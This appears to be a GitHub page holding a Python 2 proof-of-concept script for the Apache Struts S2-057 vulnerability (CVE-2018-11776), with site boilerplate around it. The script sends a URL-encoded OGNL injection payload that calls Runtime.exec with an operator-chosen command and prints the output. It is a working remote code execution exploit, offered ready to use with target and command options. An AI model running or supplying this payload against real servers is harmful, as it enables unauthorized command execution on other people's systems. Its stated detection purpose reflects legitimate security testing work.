Permalink
Cannot retrieve contributors at this time
Join GitHub today
GitHub is home to over 50 million developers working together to host and review code, manage projects, and build software together.
Sign upGitHub is where the world builds software
Millions of developers and companies build, ship, and maintain their software on GitHub — the largest and most advanced development platform in the world.
| import requests | |
| import optparse | |
| import sys | |
| import time | |
| requests.packages.urllib3.disable_warnings() | |
| # Usage python s2-057.py -u http://localhost:8080 -t /struts3-showcase/ -c calc | |
| # This script is created for detection and POCing the vulnerability. | |
| # psc4re's script to check for s2-057, CVE-2018-11776 based on payloads provided by jas502n (https://github.com/jas502n/St2-057) | |
| def zeroday_check(tgtURL, tgtPATH, tgtCMD): | |
| urlcheck = tgtURL+""+tgtPATH | |
| print "[+] Checking Vulnerability: "+urlcheck | |
| command = tgtCMD | |
| payload = "%24%7b(%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23a%3d%40java.lang.Runtime%40getRuntime().exec("+command+").getInputStream()%2c%23b%3dnew%20java.io.InputStreamReader(%23a)%2c%23c%3dnew %20java.io.BufferedReader(%23b)%2c%23d%3dnew%20char%5b51020%5d%2c%23c.read(%23d)%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23sbtest.println(%23d)%2c%23sbtest.close())%7d/actionChain1.action" | |
| resp = requests.get(urlcheck+payload, verify=False) | |
| time.sleep(1) | |
| print str(resp.status_code) + " "+urlcheck+ " !" | |
| if resp.status_code == 302: | |
| print "[+] "+tgtURL+ "is likely vulnerable" | |
| def main(): | |
| parser = optparse.OptionParser('python %prog -u <website> -t <targetpath> -c command') | |
| parser.add_option('-u','--url', dest = 'URLstrut', help ='give the URL eg., http://www.exampe.com or 127.0.0.1:8080') | |
| parser.add_option('-t', dest = 'tgtPATH', type="string", help ='eg.,/struts3-showcase/ or /struts3-showcase/ ') | |
| parser.add_option('-c', dest = 'tgtCMD', type="string", help ='eg., cmd, calc, ls') | |
| (options,args) = parser.parse_args() | |
| print "[+] Struts String injection started " | |
| tgtURL = options.URLstrut | |
| tgtPATH = options.tgtPATH | |
| tgtCMD = options.tgtCMD | |
| if((tgtURL == None) | (tgtPATH == None) | (tgtCMD == None)): | |
| print parser.usage | |
| sys.exit(0) | |
| if(requests.get(tgtURL+""+tgtPATH, verify=False).status_code==200): | |
| zeroday_check(tgtURL, tgtPATH, tgtCMD) | |
| else: | |
| print "[-] Check the Target URL and Path" | |
| print "[+] Script complete" | |
| if __name__ == "__main__": | |
| main() |